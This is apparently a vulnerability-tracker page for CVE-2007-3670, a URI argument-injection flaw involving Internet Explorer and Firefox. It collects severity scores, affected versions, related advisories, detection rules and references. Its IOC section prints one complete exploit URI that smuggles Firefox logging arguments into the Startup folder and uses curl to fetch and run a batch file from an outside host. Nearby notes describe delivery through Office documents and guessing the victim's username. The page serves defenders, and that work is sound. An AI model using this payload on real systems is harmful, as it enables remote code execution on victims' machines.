CVE-2007-3670
published 2007-07-10CVE-2007-3670: Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Firefox installed and certain URIs registered, allows remote…
PriorityP426medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
29.35%
97.9th percentile
Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Firefox installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a (1) FirefoxURL or (2) FirefoxHTML URI, which are inserted into the command line that is created when invoking firefox.exe. NOTE: it has been debated as to whether the issue is in Internet Explorer or Firefox. As of 20070711, it is CVE's opinion that IE appears to be failing to properly delimit the URL argument when invoking Firefox, and this issue could arise with other protocol handlers in IE as well. However, Mozilla has stated that it will address the issue with a "defense in depth" fix that will "prevent IE from sending Firefox malicious data."
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | quicktime | <= 7.1.5 | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| mozilla | firefox | <= 2.0.0.4 | — |
| mozilla | firefox | <= 2.0.0.6 | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | thunderbird | — | — |
| netscape | navigator | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandFirefoxURL-308046B0AF4A39CB:" -P -MOZ_LOG=raw,Widget:4 -MOZ_LOG_FILE="C:/Users/IEUser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/&cd ..&cd ..&cd Users&cd Public&curl -o z.bat poc.mm2.in&z.bat↗
- →Monitor for process launches of firefox.exe or navigator.exe with suspicious arguments including '-chrome', '-MOZ_LOG', or '-MOZ_LOG_FILE' passed via URI handler invocation (firefoxurl: or navigatorurl: schemes). ↗
- →Detect use of the '-chrome' argument passed to Firefox or Navigator via URI handler, which enables JavaScript execution in privileged Chrome context. ↗
- →Alert on command lines containing '-MOZ_LOG' or '-MOZ_LOG_FILE' arguments passed to Firefox, especially when combined with shell metacharacters (& ; |) or paths pointing to Startup folders. ↗
- →Detect spaces and double-quote characters in URIs passed to external program handlers (mailto:, firefoxurl:, navigatorurl:), which are the injection vector for argument smuggling. ↗
- →Monitor for files written to the Windows Startup folder (e.g. %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\) by Firefox or child processes spawned from Firefox. ↗
- →Detect cmd.exe being instantiated via Mozilla XPCOM interfaces (nsILocalFile / nsIProcess) from within a browser JavaScript context, as used in the navigatorurl PoC exploit. ↗
- ·The -osint flag was introduced as a fix for CVE-2007-3670 in nsAppRunner.cpp, but the -MOZ_LOG and -MOZ_LOG_FILE arguments bypass this check because they are handled in LogCommandLineHandler.cpp without the -osint guard, causing the vulnerability to resurface in later Firefox versions. ↗
- ·Major browsers (Chrome, Firefox itself) encode special characters in URLs (e.g. " becomes %22) before passing to URI handlers, preventing exploitation. However, Windows applications such as Microsoft Office do not perform this encoding, making them viable attack vectors. ↗
- ·The exploit payload requires knowledge of the victim's Windows username to construct the correct Startup folder path; in many organizations the username matches the email address prefix, enabling targeted attacks via email delivery. ↗
- ·Red Hat Enterprise Linux versions of Firefox and Thunderbird are not affected by CVE-2007-3670 or its related variants (CVE-2007-4038, CVE-2007-4039). ↗
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_redhat5.0MEDIUM
vendor_ubuntu4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qwp7-hh47-5g3h: Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Firefox installed and certain URIs registered, allows re
ghsa_unreviewed·2022-05-03
CVE-2007-3670 [MEDIUM] CWE-79 GHSA-qwp7-hh47-5g3h: Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Firefox installed and certain URIs registered, allows re
Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Firefox installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a (1) FirefoxURL or (2) FirefoxHTML URI, which are inserted into the command line that is created when invoking firefox.exe. NOTE: it has been debated as to whether the issue is in Internet Explorer or Firefox. As of 20070711, it is CVE's opinion that IE appears to be failing to properly delimit the URL argument when invoking Firefox, and this issue could arise with other protocol handlers in IE as well. However, Mozilla has stated that it will address the issue with a "defense in depth" fix that will "prevent IE from sending F
GHSA
GHSA-5qrv-2vjc-xwcq: Argument injection vulnerability involving Mozilla, when certain URIs are registered, allows remote attackers to conduct cross-browser scripting attac
ghsa_unreviewed·2022-05-01·CVSS 4.3
CVE-2007-4039 [MEDIUM] CWE-79 GHSA-5qrv-2vjc-xwcq: Argument injection vulnerability involving Mozilla, when certain URIs are registered, allows remote attackers to conduct cross-browser scripting attac
Argument injection vulnerability involving Mozilla, when certain URIs are registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in an unspecified URI, which are inserted into the command line when invoking the handling process, a similar issue to CVE-2007-3670.
GHSA
GHSA-mx2j-qfcf-xcrp: Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Netscape installed and certain URIs registered, allows r
ghsa_unreviewed·2022-05-01·CVSS 4.3
CVE-2007-3924 [MEDIUM] GHSA-mx2j-qfcf-xcrp: Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Netscape installed and certain URIs registered, allows r
Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Netscape installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a -chrome argument to the navigatorurl URI, which are inserted into the command line that is created when invoking netscape.exe, a related issue to CVE-2007-3670. NOTE: there has been debate about whether the issue is in Internet Explorer or Netscape. As of 20070713, it is CVE's opinion that IE appears to not properly delimit the URL argument when invoking Netscape; this issue could arise with other protocol handlers in IE.
GHSA
GHSA-5457-v8jm-4679: Multiple argument injection vulnerabilities in Netscape Navigator 9 allow remote attackers to execute arbitrary commands via a NULL byte (%00) and she
ghsa_unreviewed·2022-05-01·CVSS 4.3
CVE-2007-4042 [MEDIUM] GHSA-5457-v8jm-4679: Multiple argument injection vulnerabilities in Netscape Navigator 9 allow remote attackers to execute arbitrary commands via a NULL byte (%00) and she
Multiple argument injection vulnerabilities in Netscape Navigator 9 allow remote attackers to execute arbitrary commands via a NULL byte (%00) and shell metacharacters in a (1) mailto, (2) nntp, (3) news, (4) snews, or (5) telnet URI, a similar issue to CVE-2007-3670.
GHSA
GHSA-2mgm-7frw-wmjm: Argument injection vulnerability involving Microsoft Outlook and Outlook Express, when certain URIs are registered, allows remote attackers to conduct
ghsa_unreviewed·2022-05-01·CVSS 4.3
CVE-2007-4040 [MEDIUM] CWE-79 GHSA-2mgm-7frw-wmjm: Argument injection vulnerability involving Microsoft Outlook and Outlook Express, when certain URIs are registered, allows remote attackers to conduct
Argument injection vulnerability involving Microsoft Outlook and Outlook Express, when certain URIs are registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in an unspecified URI, which are inserted into the command line when invoking the handling process, a similar issue to CVE-2007-3670.
GHSA
GHSA-3r6g-vgfw-328v: Argument injection vulnerability in Mozilla Firefox before 2
ghsa_unreviewed·2022-05-01·CVSS 4.3
CVE-2007-4038 [MEDIUM] CWE-94 GHSA-3r6g-vgfw-328v: Argument injection vulnerability in Mozilla Firefox before 2
Argument injection vulnerability in Mozilla Firefox before 2.0.0.5, when running on systems with Thunderbird 1.5 installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a mailto URI, which are inserted into the command line that is created when invoking Thunderbird.exe, a similar issue to CVE-2007-3670.
GHSA
GHSA-6x5g-m8wv-w9v6: Argument injection vulnerability in Apple QuickTime 7
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2007-5045 [MEDIUM] CWE-94 GHSA-6x5g-m8wv-w9v6: Argument injection vulnerability in Apple QuickTime 7
Argument injection vulnerability in Apple QuickTime 7.1.5 and earlier, when running on systems with Mozilla Firefox before 2.0.0.7 installed, allows remote attackers to execute arbitrary commands via a QuickTime Media Link (QTL) file with an embed XML element and a qtnext parameter containing the Firefox "-chrome" argument. NOTE: this is a related issue to CVE-2006-4965 and the result of an incomplete fix for CVE-2007-3670.
GHSA
GHSA-9cfh-j5rr-38cm: Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with SeaMonkey installed and certain URIs registered, allows
ghsa_unreviewed·2022-05-01·CVSS 4.3
CVE-2007-3954 [MEDIUM] CWE-79 GHSA-9cfh-j5rr-38cm: Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with SeaMonkey installed and certain URIs registered, allows
Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with SeaMonkey installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a mailto URI, which are inserted into the command line that is created when invoking SeaMonkey.exe, a related issue to CVE-2007-3670.
GHSA
GHSA-7mf2-w637-f57x: Multiple argument injection vulnerabilities in Mozilla Firefox 2
ghsa_unreviewed·2022-05-01·CVSS 4.3
CVE-2007-4041 [MEDIUM] CWE-78 GHSA-7mf2-w637-f57x: Multiple argument injection vulnerabilities in Mozilla Firefox 2
Multiple argument injection vulnerabilities in Mozilla Firefox 2.0.0.5 and 3.0alpha allow remote attackers to execute arbitrary commands via a NULL byte (%00) and shell metacharacters in a (1) mailto, (2) nntp, (3) news, (4) snews, or (5) telnet URI, a similar issue to CVE-2007-3670.
Ubuntu
Thunderbird vulnerabilities
vendor_ubuntu·2007-08-25·CVSS 4.3
CVE-2007-3845 [MEDIUM] Thunderbird vulnerabilities
Title: Thunderbird vulnerabilities
Summary: Thunderbird vulnerabilities
Various flaws were discovered in the layout and JavaScript engines. By
tricking a user into opening a malicious email, an attacker could execute
arbitrary code with the user's privileges. Please note that JavaScript
is disabled by default for emails, and it is not recommended to enable it.
(CVE-2007-3734, CVE-2007-3735, CVE-2007-3844)
Jesper Johansson discovered that spaces and double-quotes were
not correctly handled when launching external programs. In rare
configurations, after tricking a user into opening a malicious email,
an attacker could execute helpers with arbitrary arguments with the
user's privileges. (CVE-2007-3670, CVE-2007-3845)
Instructions: After a standard system upgrade you need to restart Thunde
Red Hat
CVE-2007-5045: Argument injection vulnerability in Apple QuickTime 7
vendor_redhat·CVSS 5.0
CVE-2007-5045 [MEDIUM] CVE-2007-5045: Argument injection vulnerability in Apple QuickTime 7
Argument injection vulnerability in Apple QuickTime 7.1.5 and earlier, when running on systems with Mozilla Firefox before 2.0.0.7 installed, allows remote attackers to execute arbitrary commands via a QuickTime Media Link (QTL) file with an embed XML element and a qtnext parameter containing the Firefox "-chrome" argument. NOTE: this is a related issue to CVE-2006-4965 and the result of an incomplete fix for CVE-2007-3670.
Statement: Not vulnerable. These issues did not affect the versions of Firefox as shipped with Red Hat Enterprise Linux.
Red Hat
CVE-2007-4039: Argument injection vulnerability involving Mozilla, when certain URIs are registered, allows remote attackers to conduct cross-browser scripting attac
vendor_redhat·CVSS 4.3
CVE-2007-4039 [MEDIUM] CVE-2007-4039: Argument injection vulnerability involving Mozilla, when certain URIs are registered, allows remote attackers to conduct cross-browser scripting attac
Argument injection vulnerability involving Mozilla, when certain URIs are registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in an unspecified URI, which are inserted into the command line when invoking the handling process, a similar issue to CVE-2007-3670.
Statement: Not vulnerable. This issue does not affect the versions of Firefox or Thunderbird as shipped with Red Hat Enterprise Linux.
Red Hat
CVE-2007-4038: Argument injection vulnerability in Mozilla Firefox before 2
vendor_redhat·CVSS 4.3
CVE-2007-4038 [MEDIUM] CVE-2007-4038: Argument injection vulnerability in Mozilla Firefox before 2
Argument injection vulnerability in Mozilla Firefox before 2.0.0.5, when running on systems with Thunderbird 1.5 installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a mailto URI, which are inserted into the command line that is created when invoking Thunderbird.exe, a similar issue to CVE-2007-3670.
Statement: Not vulnerable. This issue does not affect the versions of Firefox or Thunderbird as shipped with Red Hat Enterprise Linux.
No detection rules found.
ftp://ftp.slackware.com/pub/slackware/slackware-12.0/ChangeLog.txthttp://archives.neohapsis.com/archives/fulldisclosure/2007-07/0160.htmlhttp://blog.mozilla.com/security/2007/07/10/security-issue-in-url-protocol-handling-on-windows/http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00771742http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00774579http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=565http://larholm.com/2007/07/10/internet-explorer-0day-exploit/http://msinfluentials.com/blogs/jesper/archive/2007/07/10/blocking-the-firefox-gt-ie-0-day.aspxhttp://osvdb.org/38017http://secunia.com/advisories/25984http://secunia.com/advisories/26096http://secunia.com/advisories/26149http://secunia.com/advisories/26204http://secunia.com/advisories/26216http://secunia.com/advisories/26258http://secunia.com/advisories/26271http://secunia.com/advisories/26572http://secunia.com/advisories/28179http://secunia.com/advisories/28363http://support.novell.com/techcenter/psdb/07d098f99c9fe6956523beae37f32fda.htmlhttp://www.kb.cert.org/vuls/id/358017http://www.mandriva.com/security/advisories?name=MDKSA-2007:152http://www.mozilla.org/security/announce/2007/mfsa2007-23.htmlhttp://www.mozilla.org/security/announce/2007/mfsa2007-40.htmlhttp://www.novell.com/linux/security/advisories/2007_49_mozilla.htmlhttp://www.securityfocus.com/archive/1/473276/100/0/threadedhttp://www.securityfocus.com/bid/24837http://www.securitytracker.com/id?1018351http://www.securitytracker.com/id?1018360http://www.theregister.co.uk/2007/07/11/ie_firefox_vuln/http://www.ubuntu.com/usn/usn-503-1http://www.us-cert.gov/cas/techalerts/TA07-199A.htmlhttp://www.virusbtn.com/news/virus_news/2007/07_11.xmlhttp://www.vupen.com/english/advisories/2007/2473http://www.vupen.com/english/advisories/2007/2565http://www.vupen.com/english/advisories/2007/4272http://www.vupen.com/english/advisories/2008/0082http://www.xs-sniper.com/sniperscope/IE-Pwns-Firefox.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/35346ftp://ftp.slackware.com/pub/slackware/slackware-12.0/ChangeLog.txthttp://archives.neohapsis.com/archives/fulldisclosure/2007-07/0160.htmlhttp://blog.mozilla.com/security/2007/07/10/security-issue-in-url-protocol-handling-on-windows/http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00771742http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00774579http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=565http://larholm.com/2007/07/10/internet-explorer-0day-exploit/http://msinfluentials.com/blogs/jesper/archive/2007/07/10/blocking-the-firefox-gt-ie-0-day.aspxhttp://osvdb.org/38017http://secunia.com/advisories/25984http://secunia.com/advisories/26096http://secunia.com/advisories/26149http://secunia.com/advisories/26204http://secunia.com/advisories/26216http://secunia.com/advisories/26258http://secunia.com/advisories/26271http://secunia.com/advisories/26572http://secunia.com/advisories/28179http://secunia.com/advisories/28363http://support.novell.com/techcenter/psdb/07d098f99c9fe6956523beae37f32fda.htmlhttp://www.kb.cert.org/vuls/id/358017http://www.mandriva.com/security/advisories?name=MDKSA-2007:152http://www.mozilla.org/security/announce/2007/mfsa2007-23.htmlhttp://www.mozilla.org/security/announce/2007/mfsa2007-40.htmlhttp://www.novell.com/linux/security/advisories/2007_49_mozilla.htmlhttp://www.securityfocus.com/archive/1/473276/100/0/threadedhttp://www.securityfocus.com/bid/24837http://www.securitytracker.com/id?1018351http://www.securitytracker.com/id?1018360http://www.theregister.co.uk/2007/07/11/ie_firefox_vuln/http://www.ubuntu.com/usn/usn-503-1http://www.us-cert.gov/cas/techalerts/TA07-199A.htmlhttp://www.virusbtn.com/news/virus_news/2007/07_11.xmlhttp://www.vupen.com/english/advisories/2007/2473http://www.vupen.com/english/advisories/2007/2565http://www.vupen.com/english/advisories/2007/4272http://www.vupen.com/english/advisories/2008/0082http://www.xs-sniper.com/sniperscope/IE-Pwns-Firefox.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/35346
2007-07-10
Published